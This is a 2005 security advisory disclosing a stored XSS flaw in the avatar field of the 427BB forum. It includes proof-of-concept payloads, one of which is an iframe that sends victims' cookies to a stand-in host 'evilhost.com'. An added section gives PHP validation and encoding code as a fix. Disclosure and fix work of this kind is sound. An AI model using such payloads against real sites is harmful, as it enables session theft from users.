[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][]
[]
[] HRG - Hackerlounge Research Group
[] Release: HRG006
[] Monday 03/01/05
[] 427BB
[]
[] The author can't be held responsible for any damage
[] done by a reader. You have your own responsibility.
[] Please use this document like it's meant to.
[]
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
Vulnerable: 427BB (Any Version)
---
General Information:
427BB is a simple board and I have no idea why I'm
releasing this because it's very unpopular, but what
the hell. It's based on PHP and MySQL.
---
Description:
In profile.php there is an avatar field that is
vulnerable to an XSS attack by a remote attacker. The
avatar string isn't filtered for < >. This makes it
very easy for an attacker to steal a session.
---
PoC Code:
Place the following code into the avatar field and
save it, then reload the profile page and it will
execute this code.
"><script language="javascript">alert("b00");</script><"
Some more code, this one by Blademaster:
"><iframe SRC="http://www.evilhost.com/cookiestealer.php?cookie=" WIDTH=1 HEIGHT=1></iframe><"
---
Fix and Vendor status:
Vendor has been notified, expect official patch
soon.
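Until a patch is available, the avatar value can be validated on save and encoded on output. The following is an added example, not 427BB's own code and not from the advisory's author; it assumes the avatar string is written into an <img src="..."> attribute (suggested by the leading "> in the PoC), and the function names and default image path are hypothetical.

```php
<?php
// Added example: hypothetical helpers, not taken from the 427BB source.

// Validate on save: accept only bounded, absolute http(s) URLs.
function avatar_is_acceptable(string $url): bool
{
    if ($url === '' || strlen($url) > 255) {
        return false;
    }
    // Reject control characters, whitespace, quotes, backticks and < > outright.
    if (preg_match('/[\x00-\x20"\'<>`\x7f]/', $url)) {
        return false;
    }
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return false;
    }
    // Scheme allow-list, compared case-insensitively.
    return in_array(strtolower($parts['scheme']), ['http', 'https'], true);
}

// Encode on output: ENT_QUOTES escapes " and ' as well as < > &, so a stored
// value cannot close the src attribute even if validation was bypassed.
function render_avatar(string $url): string
{
    if (!avatar_is_acceptable($url)) {
        // Placeholder path for a default image (assumption).
        return '<img src="/images/default_avatar.png" alt="avatar">';
    }
    $safe = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<img src="' . $safe . '" alt="avatar">';
}

// Constructed sample inputs; the second is the first PoC string from this advisory.
$samples = [
    'http://example.com/avatars/me.png',
    '"><script language="javascript">alert("b00");</script><"',
];
foreach ($samples as $s) {
    echo render_avatar($s), PHP_EOL;
    // What encoding alone does to the value, independent of validation:
    echo htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'), PHP_EOL;
}
```

Stripping only < > is not enough for a value placed inside a quoted attribute, because the quote character itself ends the attribute; that is why the output step uses ENT_QUOTES.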
---
Greetz:
All the people at hackerlounge.com, JWT,
TGS-Security.com and JWT-Security.net.
Specifically:
Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster,
Modzilla, Pingu, Jake Johnson, Afterburn, airo,
cardiaC, chis, ComputerGeek, deep_phreeze, dudley,
evasion, eXtacy, Mattewan, Afterburn,
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite,
Slarty, NoUse, Snake (I hate you), Surreal (I hate
you), -=Vanguard=-, The_IRS, puNKiey, driedice,
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER,
voteforpedro, Cryptic_Override, kodaxx,
~CreEpy~NoDquE~, Brainscan, the_exode,
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and
anyone else I forgot.
---
Credit:
HRG - Hackerlounge Research Group
http://www.Hackerlounge.com
Partial credit is also given to
lancastertechnologies.org, founded by JWT.